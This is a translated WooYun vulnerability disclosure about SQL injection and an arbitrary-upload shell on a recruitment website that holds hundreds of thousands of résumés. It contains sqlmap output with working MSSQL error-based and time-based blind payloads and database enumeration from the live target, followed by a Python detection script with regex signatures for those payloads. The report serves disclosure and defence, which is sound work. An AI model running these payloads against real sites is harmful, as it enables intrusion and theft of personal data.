WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online ------------------------- http://drop.zone.ci/
2015-08-30: Details reported to the vendor; awaiting vendor handling
2015-09-02: CNCERT (National Internet Emergency Center) has not yet been able to contact the responsible unit; details disclosed only to the reporting agency
2015-09-12: Details disclosed to core white hats and experts in the relevant field
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public
Injection - - Scanned for the admin backend for half a day and found nothing; in desperation logged into an account and found arbitrary upload; 2 neighbouring sites are also recruitment sites
Affected websites
http://**.**.**.**/ weight 2, PR 4
http://**.**.**.**/ weight 1, PR 4
http://**.**.**.**/ weight 2, PR 4
Extra-credit sites: 15 injection points in total
http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218
http://**.**.**.**/web_company.aspx?CompID=20150531211633218
http://**.**.**.**/login_jobpanduan.aspx?UserName=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: CompID (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] cptdb
[*] cptdb_yj
[*] dddb
[*] dlwebdb
[*] FinanceSystemDB
[*] fyh_cptdb
[*] fyh_xsdydb
[*] hbdb
[*] master
[*] model
[*] msdb
[*] tempdb

Database: dlwebdb
[61 tables]

Database: dlwebdb
Table: gj_userlist
[9 entries]
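The two sqlmap techniques above (error-based CONVERT(INT,...) and the sysusers self-join heavy query) leave recognisable traces in the IIS W3C request log of a site like this one. The following is an added detection example, not code from the report; the log lines are constructed, with the CompID value and payload shapes taken from the sqlmap output and the client IP, timestamp and status codes made up.

```python
import re
import urllib.parse

# Signatures for the two MSSQL techniques sqlmap reported above (error-based CONVERT
# and the sysusers self-join heavy query) plus the CHAR()+CHAR() string assembly.
PATTERNS = {
    "mssql-error-based-convert": re.compile(
        r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "mssql-heavy-query-selfjoin": re.compile(
        r"select\s+count\(\*\)\s+from\s+sysusers\s+as\s+\w+\s*,\s*sysusers\b", re.I),
    "mssql-char-concat": re.compile(r"(?:char\(\d+\)\s*\+\s*){3,}", re.I),
}

def classify_query(query_string):
    """Return the names of every pattern found in one raw cs-uri-query value."""
    decoded = urllib.parse.unquote_plus(query_string)
    # Second, plain unquote catches double-encoded payloads (%2528 -> %28 -> "(")
    # without turning the literal "+" of CHAR()+CHAR() into a space.
    decoded = urllib.parse.unquote(decoded)
    return [name for name, rx in PATTERNS.items() if rx.search(decoded)]

def scan_iis_log(lines):
    """Scan W3C lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)
    and return (client_ip, uri_stem, matched_patterns) for each flagged request."""
    hits = []
    for line in lines:
        fields = line.split(" ")
        if not line or line.startswith("#") or len(fields) < 7:
            continue
        matches = classify_query(fields[5])
        if matches:
            hits.append((fields[2], fields[4], matches))
    return hits

def w3c_line(ip, stem, query, status):
    """Build one constructed W3C log line with the query encoded as IIS records it."""
    return f"2015-08-30 10:01:02 {ip} GET {stem} {urllib.parse.quote(query, safe='=&')} {status}"

# Constructed sample log: CompID and the payload shapes follow the sqlmap output
# in the report; the client IP, timestamp and status codes are made up.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    w3c_line("203.0.113.7", "/web_joblist.aspx", "CompID=20150531211633218", 200),
    w3c_line("203.0.113.7", "/web_joblist.aspx",
             "CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)"
             "+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113))) AND ('oQcS'='oQcS", 500),
    w3c_line("203.0.113.7", "/web_company.aspx",
             "CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS "
             "sys1,sysusers AS sys2,sysusers AS sys3) AND ('whdK'='whdK", 200),
]
```

Run `scan_iis_log(SAMPLE_LOG)` to get the two flagged requests; the same function can be pointed at a real W3C log file read with `splitlines()`.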
Scanned for the admin backend for half a day and found nothing; in desperation logged into an account and found an arbitrary file upload, which gave a shell (getshell).
The database can be downloaded and other drives can be reached; the 2 neighbouring sites are also recruitment sites. I won't post screenshots of the database download. The impact is extremely serious.
Recommend taking this seriously: several hundred thousand résumés are at stake.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-02 08:13
CNVD confirmed and reproduced the reported issue; it has been handed to CNCERT to notify the energy sector's informatization authority, which will subsequently attempt to coordinate remediation with the website's operating unit.
None yet.